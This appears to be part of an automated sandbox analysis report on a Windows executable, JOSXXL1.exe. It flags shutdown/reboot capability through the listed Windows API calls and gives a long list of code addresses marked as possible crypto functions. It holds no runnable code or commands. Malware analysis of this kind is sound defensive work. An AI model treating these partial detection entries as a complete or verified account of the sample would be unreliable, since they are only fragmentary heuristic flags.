Source: C:\Users\user\Desktop\JOSXXL1.exe

0_2_00405421

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004033B6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_004033B6 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004033B6

Detected potential crypto function

Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00406847	0_2_00406847
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 0_2_00404C5E	0_2_00404C5E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00406847	4_2_00406847
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00404C5E	4_2_00404C5E
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015C19B	4_2_0015C19B
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015D278	4_2_0015D278
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00155362	4_2_00155362
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015C468	4_2_0015C468
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015C738	4_2_0015C738
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015E988	4_2_0015E988
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_001569A0	4_2_001569A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_001529E0	4_2_001529E0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015CA08	4_2_0015CA08
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015CCD8	4_2_0015CCD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00159DE0	4_2_00159DE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015CFAC	4_2_0015CFAC
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00156FC8	4_2_00156FC8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015E97C	4_2_0015E97C
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_0015F961	4_2_0015F961
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_00153E09	4_2_00153E09
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39692968	4_2_39692968
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39699548	4_2_39699548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969FC68	4_2_3969FC68
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39695028	4_2_39695028
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_396917A0	4_2_396917A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39691E80	4_2_39691E80
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D540	4_2_3969D540
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D550	4_2_3969D550
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969DDFF	4_2_3969DDFF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969DDF1	4_2_3969DDF1
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D9A8	4_2_3969D9A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D999	4_2_3969D999
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690040	4_2_39690040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969F802	4_2_3969F802
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690006	4_2_39690006
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39699C18	4_2_39699C18
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39695018	4_2_39695018
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969F810	4_2_3969F810
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969D0F8	4_2_3969D0F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969CCA0	4_2_3969CCA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EF60	4_2_3969EF60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EF51	4_2_3969EF51
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690B20	4_2_39690B20
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39690B30	4_2_39690B30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EB08	4_2_3969EB08
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39698BA0	4_2_39698BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969F3B8	4_2_3969F3B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969178F	4_2_3969178F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39691E70	4_2_39691E70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E24A	4_2_3969E24A
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E258	4_2_3969E258
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969DE00	4_2_3969DE00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969EAF8	4_2_3969EAF8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E6AF	4_2_3969E6AF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E6A0	4_2_3969E6A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3969E6B0	4_2_3969E6B0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D781D0	4_2_39D781D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D78FB0	4_2_39D78FB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77B78	4_2_39D77B78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76030	4_2_39D76030
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E9D8	4_2_39D7E9D8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D75BD8	4_2_39D75BD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C9D8	4_2_39D7C9D8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E9C8	4_2_39D7E9C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72FF9	4_2_39D72FF9
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D715F8	4_2_39D715F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C9E8	4_2_39D7C9E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D715E8	4_2_39D715E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7D798	4_2_39D7D798
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B798	4_2_39D7B798
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7D787	4_2_39D7D787
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D75780	4_2_39D75780
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7F788	4_2_39D7F788
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72BB0	4_2_39D72BB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D78FA1	4_2_39D78FA1
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D711A0	4_2_39D711A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72BA0	4_2_39D72BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72BAF	4_2_39D72BAF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D781AA	4_2_39D781AA
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B7A8	4_2_39D7B7A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C558	4_2_39D7C558
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72758	4_2_39D72758
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72749	4_2_39D72749
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D70D48	4_2_39D70D48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E548	4_2_39D7E548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C548	4_2_39D7C548
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77B77	4_2_39D77B77
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7F778	4_2_39D7F778
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77B69	4_2_39D77B69
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7531A	4_2_39D7531A
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B318	4_2_39D7B318
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7B307	4_2_39D7B307
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D72300	4_2_39D72300
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7D308	4_2_39D7D308
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7A938	4_2_39D7A938
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E538	4_2_39D7E538
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77722	4_2_39D77722
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D77720	4_2_39D77720
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D75328	4_2_39D75328
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7A928	4_2_39D7A928
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D74ED0	4_2_39D74ED0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D74EC0	4_2_39D74EC0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C0C8	4_2_39D7C0C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D772C8	4_2_39D772C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7D2F7	4_2_39D7D2F7
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D708F0	4_2_39D708F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D722F0	4_2_39D722F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7F2F8	4_2_39D7F2F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7F2E7	4_2_39D7F2E7
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D708E0	4_2_39D708E0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D70498	4_2_39D70498
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D71E98	4_2_39D71E98
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D70489	4_2_39D70489
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76488	4_2_39D76488
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7C0B7	4_2_39D7C0B7
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D738B8	4_2_39D738B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E0B8	4_2_39D7E0B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D772B8	4_2_39D772B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7E0A7	4_2_39D7E0A7
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D71EA8	4_2_39D71EA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7EE57	4_2_39D7EE57
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D71A50	4_2_39D71A50
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D73450	4_2_39D73450
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7345F	4_2_39D7345F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D71A41	4_2_39D71A41
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D70040	4_2_39D70040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76E72	4_2_39D76E72
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76E70	4_2_39D76E70
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D74A78	4_2_39D74A78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7CE78	4_2_39D7CE78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76478	4_2_39D76478
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7CE67	4_2_39D7CE67
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D73460	4_2_39D73460
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7EE68	4_2_39D7EE68
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D74A68	4_2_39D74A68
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D74610	4_2_39D74610
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7DC19	4_2_39D7DC19
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76A18	4_2_39D76A18
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7FC18	4_2_39D7FC18
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D73007	4_2_39D73007
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D70006	4_2_39D70006
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D73008	4_2_39D73008
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7BC38	4_2_39D7BC38
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D76022	4_2_39D76022
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D74620	4_2_39D74620
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7BC29	4_2_39D7BC29
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_39D7DC28	4_2_39D7DC28
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C6678	4_2_3A7C6678
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C56B8	4_2_3A7C56B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CE77F	4_2_3A7CE77F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C4478	4_2_3A7C4478
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C2478	4_2_3A7C2478
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CBC78	4_2_3A7CBC78
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CD470	4_2_3A7CD470
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C1270	4_2_3A7C1270
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9171	4_2_3A7C9171
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CA968	4_2_3A7CA968
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C4468	4_2_3A7C4468
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C6568	4_2_3A7C6568
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C0960	4_2_3A7C0960
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C7E60	4_2_3A7C7E60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CD460	4_2_3A7CD460
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C3B58	4_2_3A7C3B58
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CEC58	4_2_3A7CEC58
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CA958	4_2_3A7CA958
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CC150	4_2_3A7CC150
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C0950	4_2_3A7C0950
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C7E50	4_2_3A7C7E50
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C5B48	4_2_3A7C5B48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9648	4_2_3A7C9648
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C3B49	4_2_3A7C3B49
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CEC4B	4_2_3A7CEC4B
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CC144	4_2_3A7CC144
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C0040	4_2_3A7C0040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C6B40	4_2_3A7C6B40
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C3238	4_2_3A7C3238
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CD938	4_2_3A7CD938
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C5B39	4_2_3A7C5B39
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9637	4_2_3A7C9637
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CAE30	4_2_3A7CAE30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C6B30	4_2_3A7C6B30
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C5228	4_2_3A7C5228
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C8328	4_2_3A7C8328
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CD927	4_2_3A7CD927
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CF120	4_2_3A7CF120
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C6621	4_2_3A7C6621
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C521C	4_2_3A7C521C
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CAE1F	4_2_3A7CAE1F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C2918	4_2_3A7C2918
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CC618	4_2_3A7CC618
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C8319	4_2_3A7C8319
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C1710	4_2_3A7C1710
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9B10	4_2_3A7C9B10
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CF111	4_2_3A7CF111
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C660F	4_2_3A7C660F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C4908	4_2_3A7C4908
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C7008	4_2_3A7C7008
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CC608	4_2_3A7CC608
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CDE00	4_2_3A7CDE00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C16FF	4_2_3A7C16FF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9AFF	4_2_3A7C9AFF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C1FF8	4_2_3A7C1FF8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CB2F8	4_2_3A7CB2F8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C6FFB	4_2_3A7C6FFB
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C48F7	4_2_3A7C48F7
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C0DF0	4_2_3A7C0DF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C87F0	4_2_3A7C87F0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CDDF0	4_2_3A7CDDF0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C3FE8	4_2_3A7C3FE8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CF5E8	4_2_3A7CF5E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C1FE8	4_2_3A7C1FE8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CB2E8	4_2_3A7CB2E8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CCAE0	4_2_3A7CCAE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C0DE0	4_2_3A7C0DE0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C87E0	4_2_3A7C87E0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C5FD8	4_2_3A7C5FD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9FD8	4_2_3A7C9FD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C3FD8	4_2_3A7C3FD8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CF5D7	4_2_3A7CF5D7
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C04D0	4_2_3A7C04D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C74D0	4_2_3A7C74D0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CCAD1	4_2_3A7CCAD1
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9FCC	4_2_3A7C9FCC
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CE2C8	4_2_3A7CE2C8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C5FC7	4_2_3A7C5FC7
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CB7C0	4_2_3A7CB7C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C04C0	4_2_3A7C04C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C74BF	4_2_3A7C74BF
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C8CB8	4_2_3A7C8CB8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CE2B8	4_2_3A7CE2B8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CB7B4	4_2_3A7CB7B4
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CFAB0	4_2_3A7CFAB0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C2DA8	4_2_3A7C2DA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CCFA8	4_2_3A7CCFA8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C56A8	4_2_3A7C56A8
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C8CA9	4_2_3A7C8CA9
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CCFA6	4_2_3A7CCFA6
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C1BA0	4_2_3A7C1BA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CA4A0	4_2_3A7CA4A0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CFAA0	4_2_3A7CFAA0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C4D98	4_2_3A7C4D98
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C7998	4_2_3A7C7998
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CE790	4_2_3A7CE790
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C1B91	4_2_3A7C1B91
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CA48F	4_2_3A7CA48F
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C2488	4_2_3A7C2488
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7CBC88	4_2_3A7CBC88
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C7988	4_2_3A7C7988
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C4D89	4_2_3A7C4D89
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C1280	4_2_3A7C1280
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7C9180	4_2_3A7C9180
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7FEE48	4_2_3A7FEE48
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F70C0	4_2_3A7F70C0
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7FD710	4_2_3A7FD710
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F4E60	4_2_3A7F4E60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F1C60	4_2_3A7F1C60
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F6440	4_2_3A7F6440
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F3240	4_2_3A7F3240
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0040	4_2_3A7F0040
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F0038	4_2_3A7F0038
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F4820	4_2_3A7F4820
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F1620	4_2_3A7F1620
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F5E00	4_2_3A7F5E00
Source: C:\Users\user\Desktop\JOSXXL1.exe	Code function: 4_2_3A7F2C00	4_2_3A7F2C00
